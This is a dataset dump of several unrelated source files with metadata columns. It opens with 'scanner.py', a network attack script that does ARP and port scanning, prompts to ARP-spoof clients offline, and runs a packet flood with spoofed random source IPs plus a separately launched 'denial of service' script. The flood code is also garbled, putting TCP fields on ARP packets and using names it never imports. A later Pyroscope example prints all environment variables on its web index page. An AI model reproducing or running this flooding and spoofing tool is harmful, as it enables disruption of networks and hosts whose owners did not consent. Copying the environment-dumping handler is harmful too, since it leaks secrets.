filename
stringlengths 4
198
| content
stringlengths 25
939k
| environment
list | variablearg
list | constarg
list | variableargjson
stringclasses 1
value | constargjson
stringlengths 2
3.9k
| lang
stringclasses 3
values | constargcount
float64 0
129
⌀ | variableargcount
float64 0
0
⌀ | sentence
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|
scanner.py
|
import re
import sys
import scapy.all as scapy
import os
import time as t
import socket
import colorama
import psutil
from colorama import Fore
from colorama import init
import datetime
import pyfiglet
from datetime import datetime
import subprocess
from os import system
from sys import stdout
init()
def oscheck(): # check the os's system name since this script and other scripts are primary to just linux
t.sleep(1)
if sys.platform == 'linux':
print(Fore.GREEN+"Your system is compatible conitnuing to script ")
if sys.platform == 'win32':
print(Fore.RED+"Sorry your system doesnt seem to compatible but just might be")
A = str(input(" Would you like to continue anyway? n/Y ===> "))
if 'n' in A:
t.sleep(1)
os.system('cls')
print("Okay have a nice one!")
sys.exit()
elif 'Y' == A:
t.sleep(1)
print(" okay continuing! ")
t.sleep(1)
os.system('cls')
if sys.platform == 'win64':
print(Fore.RED+"Sorry your system doesnt seem to compatible but just might be")
A = str(input(" Would you like to continue anyway? n/Y ===> "))
if 'n' in A:
t.sleep(1)
os.system('cls')
print("Okay have a nice one!")
sys.exit()
elif 'Y' == A:
t.sleep(1)
print(" okay continuing! ")
t.sleep(1)
os.system('cls')
def linesep():
print(Fore.RED+"")
print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
def exit():
print("[!] Exiting [!] ")
sys.exit()
def checkinter():
wlan_pattern = re.compile("^wlan[0-9]+")
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
# No adapter above wlan0 is connected
if len(check_wifi_result) == 0:
print("Please connect a WiFi adapter and try again.")
exit()
def check():
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def CS(X): # variable X to combine clear and sleep
t.sleep(X)
os.system('clear')
def seperator():
print(Fore.RED+"") # seperation block for neatness
print("""
--------------------------------------
| |
| Arp scan completed |
|------------------------------------|
| |
| moving to Port Scan |
|------------------------------------|
""")
def emoji():
import emoji
print(emoji.emojize(":winking_face_with_tongue:"))
def bannerarp(): # banner for the arp DDOSING and spoofing
CS(2)
print(Fore.RED+"")
print("""
_______
| _ |.----..-----..--.--. ______ .-----..--.--.
| || _|| _ || | ||______|| _ || | |
|___|___||__| | __||___ | | __||___ |
|__| |_____| |__| |_____|
|-----|
|V-1.0| AHHHHH STEPPPP BROOOO \033[33m 😜
|-----| """,)
def banner():
CS(2)
print(Fore.RED+"")
print("""
.-----..----..---.-..-----. ______ .-----..--.--.
|__ --|| __|| _ || ||______|| _ || | |
|_____||____||___._||__|__| | __||___ |
|__| |_____|
____________
| V 1.0 |
|----------|
| Arp scan |
| discover |
| attack |
|----------|
-----------------------------------------------------
""")
def cpu_usage():
t.sleep(1)
print("------------------------------cpu usage las recorded while using this script -------------------------------------")
t.sleep(1)
print(" first im going to show the information about then the usage ")
print("Physical cores:", psutil.cpu_count(logical=False))
t.sleep(0.1)
print("Total Cores:", psutil.cpu_count(logical=True))
cpufreq = psutil.cpu_freq()
t.sleep(0.1)
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
t.sleep(0.1)
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
t.sleep(0.1)
print(f"CUrrent Frequency: {cpufreq.current:.2f}Mhz")
t.sleep(0.1)
print(" ------------------------------CPU USAGE OVER TIME OF THIS SCRIPT-------------------------------------------")
print("------------------------------------------------------------------------------------------------------------")
print("CPU Usage Per Core:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
print(f"Core {i}: {percentage}%")
t.sleep(0.1)
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
t.sleep(1.5)
def scan1():
ip_add_range_pattern = re.compile("^(?:[0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]*$")
while True:
print(Fore.RED+"")
t.sleep(2)
print("----------------------------------------------------------------")
t.sleep(0.1)
print(" MAKE SURE ITS A RANGE (ex 192.168.1.0/24) ")
t.sleep(0.1)
print(" MAKE SURE YOU RAN THIS PROGRAM AS ROOT ")
t.sleep(0.1)
print(" MAKE SURE YOU ARE ON THE CURRENT NETWORK ")
t.sleep(0.1)
print(" MAKE SURE YOU HAVE PREMISSION TO DO THIS ")
t.sleep(0.1)
print("----------------------------------------------------------------")
ip_add_range_entered = input("\nIPA to send ARP to ==> ")
if ip_add_range_pattern.search(ip_add_range_entered):
print(f"{ip_add_range_entered} is a valid IP range")
break
print(Fore.GREEN+"")
arp_result = scapy.arping(ip_add_range_entered)
A = str(input(" Would you like to run extra scans? [y/N] ===> "))
linesep()
if 'N' in A:
t.sleep(1)
print("\n[*] Okay Continuing [*]")
if 'y' in A:
t.sleep(1)
os.system('sudo arp-scan -l -W scan.pcap')
os.system('tshark -r scan.pcap')
def interfacescan():
import psutil
from tabulate import tabulate
class InterfaceScanner(object):
def __init__(self):
self.instance = psutil.net_if_addrs()
def scanner(self):
self.interfaces = []
self.address_ip = []
self.netmask_ip = []
self.broadcast_ip = []
for interface_name, interface_addresses in self.instance.items():
self.interfaces.append(interface_name)
for address in interface_addresses:
if str(address.family) == 'AddressFamily.AF_INET':
self.address_ip.append(address.address)
self.netmask_ip.append(address.netmask)
self.broadcast_ip.append(address.broadcast)
data = {"Interface" : [*self.interfaces],
"IP-Address" : [*self.address_ip],
"Netmask" : [*self.netmask_ip],
"Broadcast-IP" : [*self.netmask_ip]
}
return tabulate(data, headers="keys", tablefmt="github")
def __str__(self):
return str(self.scanner())
if __name__ == "__main__":
print(Fore.BLUE+"")
print("---------------------You're interfaces--------------------------")
t.sleep(0.1)
print(InterfaceScanner())
def port_scan():
seperator()
print(Fore.BLUE+"")
print(Fore.RED+"what IPA would you like to port scan ")
target = str(input("Target ====> "))
print("-"*80)
print('please wait scanning host', target, 'At date-time ==> ' + str(datetime.now()))
print("-"*80)
t1 = datetime.now()
try:
for port in range(1,65535):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = s.connect_ex((target,port))
if result ==0: # number color format print(Fore.RED+" isnt avalible for str and multiple brackets and variables")
timescan = '[DATA] At ==>' + str(datetime.now())
print(timescan)
print("----------------------------------------------------------------------------------------------")
print("\033[35m Port ===> \033[36m [\033[35m {} \033[36m ] \033[35m Appears To Be Open".format(port))
print("----------------------------------------------------------------------------------------------")
s.close()#finally fucking close it after spending hours on color format just to find out like rust you forgot a ; that messed the enteire script up
except KeyboardInterrupt: # instead of it being a damn semi colon you forgot to put fucking m SMH FML(programmer rage)
linesep()
t.sleep(1)
print(" [!] EXITING [!]")
t.sleep(1)
except socket.gaierror:
print("\n [!]Hostname Could Not Be Resolved[!]")
sys.exit()
except socket.error:
t.sleep(1)
print("\n Server is not giving resposes[!]")
sys.exit()
except NameError:
os.system(' clear ')
t.sleep(1)
print(" [!] TARGET WAS NOT DEFINED ")
print(" [!] try a target like 127.0.0.1 ")
def arp1():
def randomIP():
ip = ".".join(map(str, (randint(0,255)for _ in range(4))))
return ip
def randInt():
x = randint(1000,9000)
return x
def TCP_Flood(dstIP,dstPort,counter):
total = 0
print ("ARPY Hammering ")
for x in range (0,counter):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP
ARP_Packet = ARP ()
ARP_Packet.sport = s_port
ARP_Packet.dport = dstPort
ARP_Packet.flags = "S"
ARP_Packet.seq = s_eq
ARP_Packet.window = w_indow
send(IP_Packet/ARP_Packet, verbose=0)
total+=1
stdout.write("\nTotal packets sent: %i\n" % total)
def info():
print("-----------------------------")
dstIP = input ("\nTarget IP ===> ")
print("-----------------------------")
dstPort = input ("Target Port ===> ")
return dstIP,int(dstPort)
def main():
dstIP,dstPort = info()
counter = input ("How many packets do you want to send : ")
TCP_Flood(dstIP,dstPort,int(counter))
main()
def UDP1():
print(Fore.MAGENTA+"")
os.system('sudo python A.py')
print(Fore.BLUE+"")
print(" ------------------------------------------------------------------------")
print(" [DATA] -- Denial of service stopped at ===> " + str(datetime.now()))
print(" ------------------------------------------------------------------------")
print(" I hope i was able to help, thanks for stopping by! have a nice one :D ")
def spoofie():
A = str(input(" Would you like to Arp-Spoof clients offline? [y/N]==> "))
if 'N' in A:
t.sleep(1)
print(" [*] this is the end of script i hope ")
print(" [*] this was able to help, goodbye! ")
elif 'y' == A:
t.sleep(1)
print(" [!] Clearning screen in ")
t.sleep(1)
print("1")
t.sleep(1)
print("2")
t.sleep(1)
print("3")
CS(2)
bannerarp()
print(" A == IP | B == website ")
arp = str(input(" is your host a website or a IP ==> "))
if 'A' in arp:
t.sleep(1)
print(" scanning the network again since terminal was cleared ")
CS(2)
check()
checkinter()
bannerarp()
linesep()
scan1()
interfacescan()
port_scan()
os.system('sudo python3 i.py')
if 'B' in arp:
t.sleep(1)
CS(2)
print(" Scanning again since terminal was cleared ")
check()
checkinter()
bannerarp()
linesep()
interfacescan()
port_scan()
UDP1()
if __name__ == '__main__':
oscheck()
t.sleep(1)
os.system('clear')
banner()
check()
checkinter()
interfacescan()
spoofie()
UDP1()
cpu_usage()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
cmd/ci-secret-generator/main.go
|
package main
import (
"bytes"
"errors"
"flag"
"fmt"
"io/ioutil"
"os"
"os/exec"
"reflect"
"strings"
"github.com/sirupsen/logrus"
utilerrors "k8s.io/apimachinery/pkg/util/errors"
"k8s.io/test-infra/prow/logrusutil"
"github.com/openshift/ci-tools/pkg/api/secretbootstrap"
"github.com/openshift/ci-tools/pkg/api/secretgenerator"
"github.com/openshift/ci-tools/pkg/secrets"
)
type options struct {
secrets secrets.CLIOptions
logLevel string
configPath string
bootstrapConfigPath string
outputFile string
dryRun bool
validate bool
validateOnly bool
maxConcurrency int
config secretgenerator.Config
bootstrapConfig secretbootstrap.Config
}
func parseOptions(censor *secrets.DynamicCensor) options {
var o options
fs := flag.NewFlagSet(os.Args[0], flag.ExitOnError)
fs.BoolVar(&o.dryRun, "dry-run", true, "Whether to actually create the secrets in vault.")
fs.StringVar(&o.configPath, "config", "", "Path to the config file to use for this tool.")
fs.StringVar(&o.bootstrapConfigPath, "bootstrap-config", "", "Path to the config file used for bootstrapping cluster secrets after using this tool.")
fs.BoolVar(&o.validate, "validate", true, "Validate that the items created from this tool are used in bootstrapping")
fs.BoolVar(&o.validateOnly, "validate-only", false, "If the tool should exit after the validation")
fs.StringVar(&o.outputFile, "output-file", "", "output file for dry-run mode")
fs.StringVar(&o.logLevel, "log-level", "info", fmt.Sprintf("Log level is one of %v.", logrus.AllLevels))
fs.IntVar(&o.maxConcurrency, "concurrency", 1, "Maximum number of concurrent in-flight goroutines to BitWarden.")
o.secrets.Bind(fs, os.Getenv, censor)
if err := fs.Parse(os.Args[1:]); err != nil {
logrus.WithError(err).Errorf("cannot parse args: %q", os.Args[1:])
}
return o
}
func (o *options) validateOptions() error {
level, err := logrus.ParseLevel(o.logLevel)
if err != nil {
return fmt.Errorf("invalid log level specified: %w", err)
}
logrus.SetLevel(level)
if !o.dryRun {
if err := o.secrets.Validate(); err != nil {
return err
}
}
if o.configPath == "" {
return errors.New("--config is empty")
}
if o.validate && o.bootstrapConfigPath == "" {
return errors.New("--bootstrap-config is required with --validate")
}
return nil
}
func (o *options) completeOptions(censor *secrets.DynamicCensor) error {
if err := o.secrets.Complete(censor); err != nil {
return err
}
var err error
o.config, err = secretgenerator.LoadConfigFromPath(o.configPath)
if err != nil {
return err
}
if o.bootstrapConfigPath != "" {
if err := secretbootstrap.LoadConfigFromFile(o.bootstrapConfigPath, &o.bootstrapConfig); err != nil {
return fmt.Errorf("couldn't load the bootstrap config: %w", err)
}
}
return o.validateConfig()
}
func cmdEmptyErr(itemIndex, entryIndex int, entry string) error {
return fmt.Errorf("config[%d].%s[%d]: empty field not allowed for cmd if name is specified", itemIndex, entry, entryIndex)
}
func (o *options) validateConfig() error {
for i, item := range o.config {
if item.ItemName == "" {
return fmt.Errorf("config[%d].itemName: empty key is not allowed", i)
}
for fieldIndex, field := range item.Fields {
if field.Name != "" && field.Cmd == "" {
return cmdEmptyErr(i, fieldIndex, "fields")
}
}
for paramName, params := range item.Params {
if len(params) == 0 {
return fmt.Errorf("at least one argument required for param: %s, itemName: %s", paramName, item.ItemName)
}
}
}
return nil
}
func executeCommand(command string) ([]byte, error) {
out, err := exec.Command("bash", "-o", "errexit", "-o", "nounset", "-o", "pipefail", "-c", command).CombinedOutput()
if err != nil {
return nil, fmt.Errorf("%s : %w", string(out), err)
}
if len(out) == 0 || len(bytes.TrimSpace(out)) == 0 {
return nil, fmt.Errorf("command %q returned no output", command)
}
if string(bytes.TrimSpace(out)) == "null" {
return nil, fmt.Errorf("command %s returned 'null' as output", command)
}
return out, nil
}
func updateSecrets(config secretgenerator.Config, client secrets.Client) error {
var errs []error
for _, item := range config {
logger := logrus.WithField("item", item.ItemName)
for _, field := range item.Fields {
logger = logger.WithFields(logrus.Fields{
"field": field.Name,
"command": field.Cmd,
})
logger.Info("processing field")
out, err := executeCommand(field.Cmd)
if err != nil {
msg := "failed to generate field"
logger.WithError(err).Error(msg)
errs = append(errs, errors.New(msg))
continue
}
if err := client.SetFieldOnItem(item.ItemName, field.Name, out); err != nil {
msg := "failed to upload field"
logger.WithError(err).Error(msg)
errs = append(errs, errors.New(msg))
continue
}
}
// Adding the notes not empty check here since we dont want to overwrite any notes that might already be present
// If notes have to be deleted, it would have to be a manual operation where the user goes to the bw web UI and removes
// the notes
if item.Notes != "" {
logger = logger.WithFields(logrus.Fields{
"notes": item.Notes,
})
logger.Info("adding notes")
if err := client.UpdateNotesOnItem(item.ItemName, item.Notes); err != nil {
msg := "failed to update notes"
logger.WithError(err).Error(msg)
errs = append(errs, errors.New(msg))
}
}
}
return utilerrors.NewAggregate(errs)
}
func main() {
logrusutil.ComponentInit()
censor := secrets.NewDynamicCensor()
logrus.SetFormatter(logrusutil.NewFormatterWithCensor(logrus.StandardLogger().Formatter, &censor))
o := parseOptions(&censor)
if err := o.validateOptions(); err != nil {
logrus.WithError(err).Fatal("invalid arguments.")
}
if err := o.completeOptions(&censor); err != nil {
logrus.WithError(err).Fatal("failed to complete options.")
}
itemContextsFromConfig := itemContextsFromConfig(o.config)
if o.validate {
if err := validateContexts(itemContextsFromConfig, o.bootstrapConfig); err != nil {
for _, err := range err.Errors() {
logrus.WithError(err).Error("Invalid entry")
}
logrus.Fatal("Failed to validate secret entries.")
}
}
if o.validateOnly {
logrus.Info("Validation succeeded and --validate-only is set, exiting")
return
}
if errs := generateSecrets(o, &censor); len(errs) > 0 {
logrus.WithError(utilerrors.NewAggregate(errs)).Fatal("Failed to update secrets.")
}
logrus.Info("Updated secrets.")
}
func generateSecrets(o options, censor *secrets.DynamicCensor) (errs []error) {
var client secrets.Client
if o.dryRun {
var err error
var f *os.File
if o.outputFile == "" {
f, err = ioutil.TempFile("", "ci-secret-generator")
if err != nil {
return append(errs, fmt.Errorf("failed to create tempfile: %w", err))
}
logrus.Infof("Writing secrets to %s", f.Name())
} else {
f, err = os.OpenFile(o.outputFile, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, os.ModePerm)
if err != nil {
return append(errs, fmt.Errorf("failed to open output file %q: %w", o.outputFile, err))
}
}
client = secrets.NewDryRunClient(f)
} else {
var err error
client, err = o.secrets.NewClient(censor)
if err != nil {
return append(errs, fmt.Errorf("failed to create secrets client: %w", err))
}
}
if err := updateSecrets(o.config, client); err != nil {
errs = append(errs, fmt.Errorf("failed to update secrets: %w", err))
}
return errs
}
func itemContextsFromConfig(items secretgenerator.Config) []secretbootstrap.ItemContext {
var itemContexts []secretbootstrap.ItemContext
for _, item := range items {
for _, field := range item.Fields {
itemContexts = append(itemContexts, secretbootstrap.ItemContext{
Item: item.ItemName,
Field: field.Name,
})
}
}
return itemContexts
}
func validateContexts(contexts []secretbootstrap.ItemContext, config secretbootstrap.Config) utilerrors.Aggregate {
var errs []error
for _, needle := range contexts {
var found bool
for _, secret := range config.Secrets {
for _, haystack := range secret.From {
haystack.Item = strings.TrimPrefix(haystack.Item, config.VaultDPTPPrefix+"/")
if reflect.DeepEqual(needle, haystack) {
found = true
}
for _, dc := range haystack.DockerConfigJSONData {
ctx := secretbootstrap.ItemContext{
Item: strings.TrimPrefix(dc.Item, config.VaultDPTPPrefix+"/"),
Field: dc.AuthField,
}
if reflect.DeepEqual(needle, ctx) {
found = true
}
}
}
}
if !found {
errs = append(errs, fmt.Errorf("could not find context %v in bootstrap config", needle))
}
}
return utilerrors.NewAggregate(errs)
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| 0 | 0 | |
web/manager.go
|
package web
import (
"github.com/draringi/SermonStation/audio"
"log"
"net/http"
_ "net/http/pprof"
"os"
)
const (
defaultBaseDir = "/usr/local/www/sermons/"
)
var baseDir string = os.Getenv("SERMON_BASEDIR")
var audioManager *audio.Manager
func StartServer(AudioManager *audio.Manager) {
if baseDir == "" {
baseDir = defaultBaseDir
}
router := getRouter()
audioManager = AudioManager
http.Handle("/api/", router)
go func() {
for {
log.Println(http.ListenAndServe(":8080", nil))
}
}()
}
|
[
"\"SERMON_BASEDIR\""
] |
[] |
[
"SERMON_BASEDIR"
] |
[]
|
["SERMON_BASEDIR"]
|
go
| 1 | 0 | |
examples/golang-push/rideshare/main.go
|
package main
import (
"net/http"
"os"
"rideshare/bike"
"rideshare/car"
"rideshare/scooter"
"github.com/pyroscope-io/client/pyroscope"
)
func bikeRoute(w http.ResponseWriter, r *http.Request) {
bike.OrderBike(1)
w.Write([]byte("<h1>Bike ordered</h1>"))
}
func scooterRoute(w http.ResponseWriter, r *http.Request) {
scooter.OrderScooter(2)
w.Write([]byte("<h1>Scooter ordered</h1>"))
}
func carRoute(w http.ResponseWriter, r *http.Request) {
car.OrderCar(3)
w.Write([]byte("<h1>Car ordered</h1>"))
}
func index(w http.ResponseWriter, r *http.Request) {
result := "<h1>environment vars:</h1>"
for _, env := range os.Environ() {
result += env + "<br>"
}
w.Write([]byte(result))
}
func main() {
serverAddress := os.Getenv("PYROSCOPE_SERVER_ADDRESS")
if serverAddress == "" {
serverAddress = "http://localhost:4040"
}
pyroscope.Start(pyroscope.Config{
ApplicationName: "ride-sharing-app",
ServerAddress: serverAddress,
Logger: pyroscope.StandardLogger,
Tags: map[string]string{"region": os.Getenv("REGION")},
})
http.HandleFunc("/", index)
http.HandleFunc("/bike", bikeRoute)
http.HandleFunc("/scooter", scooterRoute)
http.HandleFunc("/car", carRoute)
err := http.ListenAndServe(":5000", nil)
if err != nil {
panic(err)
}
}
|
[
"\"PYROSCOPE_SERVER_ADDRESS\"",
"\"REGION\""
] |
[] |
[
"REGION",
"PYROSCOPE_SERVER_ADDRESS"
] |
[]
|
["REGION", "PYROSCOPE_SERVER_ADDRESS"]
|
go
| 2 | 0 | |
manifest/docker.go
|
package manifest
import (
"encoding/json"
"net/url"
"os"
"os/exec"
"strconv"
"strings"
)
var Docker = func(args ...string) *exec.Cmd {
return exec.Command("docker", args...)
}
func dockerHost() (host string) {
host = "127.0.0.1"
if h := os.Getenv("DOCKER_HOST"); h != "" {
u, err := url.Parse(h)
if err != nil {
return
}
parts := strings.Split(u.Host, ":")
host = parts[0]
}
return
}
func DockerHostExposedPorts() ([]int, error) {
open := []int{}
data, err := Docker("ps", "--format", "{{.ID}}").Output()
if err != nil {
return nil, err
}
for _, ps := range strings.Split(strings.TrimSpace(string(data)), "\n") {
if ps == "" {
continue
}
data, err := Docker("inspect", "--format", "{{json .NetworkSettings.Ports}}", ps).Output()
if err != nil {
return nil, err
}
var ports map[string][]struct {
HostPort string
}
err = json.Unmarshal(data, &ports)
if err != nil {
return nil, err
}
for _, port := range ports {
for _, m := range port {
p, err := strconv.Atoi(m.HostPort)
if err != nil {
return nil, err
}
open = append(open, p)
}
}
}
return open, nil
}
|
[
"\"DOCKER_HOST\""
] |
[] |
[
"DOCKER_HOST"
] |
[]
|
["DOCKER_HOST"]
|
go
| 1 | 0 | |
test/e2e_flags.go
|
/*
Copyright 2018 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// This file contains logic to encapsulate flags which are needed to specify
// what cluster, etc. to use for e2e tests.
package test
import (
"flag"
"fmt"
"os"
"path"
pkgTest "github.com/knative/pkg/test"
"github.com/knative/pkg/test/logging"
)
// EventingFlags holds the command line flags specific to knative/eventing
var EventingFlags = initializeEventingFlags()
// EventingEnvironmentFlags holds the e2e flags needed only by the eventing repo
type EventingEnvironmentFlags struct {
DockerRepo string // Docker repo (defaults to $DOCKER_REPO_OVERRIDE)
Tag string // Tag for test images
Provisioner string // The name of the Channel's ClusterChannelProvisioner
}
func initializeEventingFlags() *EventingEnvironmentFlags {
var f EventingEnvironmentFlags
repo := os.Getenv("DOCKER_REPO_OVERRIDE")
if repo == "" {
repo = os.Getenv("KO_DOCKER_REPO")
}
defaultRepo := path.Join(repo, "github.com/knative/eventing/test/test_images")
flag.StringVar(&f.DockerRepo, "dockerrepo", defaultRepo,
"Provide the uri of the docker repo you have uploaded the test image to using `uploadtestimage.sh`. Defaults to $DOCKER_REPO_OVERRIDE")
flag.StringVar(&f.Tag, "tag", "e2e", "Provide the version tag for the test images.")
flag.StringVar(&f.Provisioner, "clusterChannelProvisioner", "in-memory-channel", "The name of the Channel's clusterChannelProvisioner. Only the in-memory-channel is installed by the tests, anything else must be installed before the tests are run.")
flag.Parse()
logging.InitializeLogger(pkgTest.Flags.LogVerbose)
if pkgTest.Flags.EmitMetrics {
logging.InitializeMetricExporter()
}
return &f
}
// ImagePath returns an image path using the configured image repo and tag.
func ImagePath(name string) string {
return fmt.Sprintf("%s/%s:%s", EventingFlags.DockerRepo, name, EventingFlags.Tag)
}
|
[
"\"DOCKER_REPO_OVERRIDE\"",
"\"KO_DOCKER_REPO\""
] |
[] |
[
"DOCKER_REPO_OVERRIDE",
"KO_DOCKER_REPO"
] |
[]
|
["DOCKER_REPO_OVERRIDE", "KO_DOCKER_REPO"]
|
go
| 2 | 0 | |
test/functional/test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:oasisTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import signal
import sys
import subprocess
import tempfile
import re
import logging
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
BASE_SCRIPTS= [
# Scripts that are run by the travis build process.
# Longest test should go first, to favor running tests in parallel
'wallet_basic.py', # ~ 1155 sec
'wallet_backup.py', # ~ 459 sec
'mining_pos_reorg.py', # ~ 305 sec
# vv Tests less than 5m vv
'mining_pos_coldStaking.py', # ~ 289 sec
'wallet_zerocoin_publicspends.py', # ~ 270 sec
'p2p_time_offset.py', # ~ 263 sec
'wallet_abandonconflict.py', # ~ 208 sec
'rpc_rawtransaction.py', # ~ 190 sec
'wallet_zapwallettxes.py', # ~ 172 sec
'wallet_keypool_topup.py', # ~ 167 sec
'wallet_txn_doublespend.py --mineblock', # ~ 157 sec
'wallet_txn_clone.py --mineblock', # ~ 157 sec
'interface_rest.py', # ~ 154 sec
'rpc_spork.py', # ~ 149 sec
'feature_proxy.py', # ~ 143 sec
'feature_uacomment.py', # ~ 130 sec
'mining_pos_fakestake.py', # ~ 123 sec
'wallet_import_stakingaddress.py', # ~ 123 sec
# vv Tests less than 2m vv
'p2p_disconnect_ban.py', # ~ 118 sec
'wallet_listreceivedby.py', # ~ 117 sec
'feature_reindex.py', # ~ 110 sec
'interface_http.py', # ~ 105 sec
'rpc_listtransactions.py', # ~ 97 sec
'mempool_reorg.py', # ~ 92 sec
'wallet_encryption.py', # ~ 89 sec
'wallet_keypool.py', # ~ 88 sec
'wallet_dump.py', # ~ 83 sec
'rpc_net.py', # ~ 83 sec
'rpc_bip38.py', # ~ 82 sec
'interface_bitcoin_cli.py', # ~ 80 sec
# vv Tests less than 60s vv
'wallet_accounts.py', # ~ 55 sec
'mempool_resurrect.py', # ~ 51 sec
'rpc_budget.py', # ~ 50 sec
'mempool_spend_coinbase.py', # ~ 50 sec
'rpc_signrawtransaction.py', # ~ 50 sec
'rpc_decodescript.py', # ~ 50 sec
'rpc_blockchain.py', # ~ 50 sec
'wallet_disable.py', # ~ 50 sec
'rpc_signmessage.py', # ~ 50 sec
'feature_help.py', # ~ 30 sec
# Don't append tests at the end to avoid merge conflicts
# Put them in a random line within the section that fits their approximate run-time
# 'feature_block.py',
# 'rpc_fundrawtransaction.py',
# 'wallet_importmulti.py',
# 'mempool_limit.py', # We currently don't limit our mempool_reorg
# 'interface_zmq.py',
# 'rpc_getchaintips.py',
# 'mempool_persist.py',
# 'rpc_users.py',
# 'rpc_deprecated.py',
# 'p2p_mempool.py',
# 'mining_prioritisetransaction.py',
# 'p2p_invalid_block.py',
# 'p2p_invalid_tx.py',
# 'wallet_import_rescan.py',
# 'mining_basic.py',
# 'wallet_bumpfee.py',
# 'wallet_listsinceblock.py',
# 'p2p_leak.py',
# 'feature_cltv.py',
# 'wallet_resendwallettransactions.py',
# 'feature_minchainwork.py',
# 'p2p_fingerprint.py',
# 'p2p_unrequested_blocks.py',
# 'feature_config_args.py',
]
EXTENDED_SCRIPTS = [
# These tests are not run by the travis build process.
# Longest test should go first, to favor running tests in parallel
# vv Tests less than 20m vv
#'feature_fee_estimation.py',
# vv Tests less than 5m vv
# vv Tests less than 2m vv
#'p2p_timeouts.py',
# vv Tests less than 60s vv
#'p2p_feefilter.py',
'rpc_bind.py',
# vv Tests less than 30s vv
#'example_test.py',
'feature_notifications.py',
'rpc_invalidateblock.py',
]
# Place EXTENDED_SCRIPTS first since it has the 3 longest running tests
ALL_SCRIPTS = EXTENDED_SCRIPTS + BASE_SCRIPTS
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
def main():
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0, help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface')
parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests')
parser.add_argument('--force', '-f', action='store_true', help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.')
parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true', help='only print dots, results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile))
passon_args.append("--configfile=%s" % configfile)
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = "%s/oasis_test_runner_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
os.makedirs(tmpdir)
logging.debug("Temporary test directory at %s" % tmpdir)
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print("Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
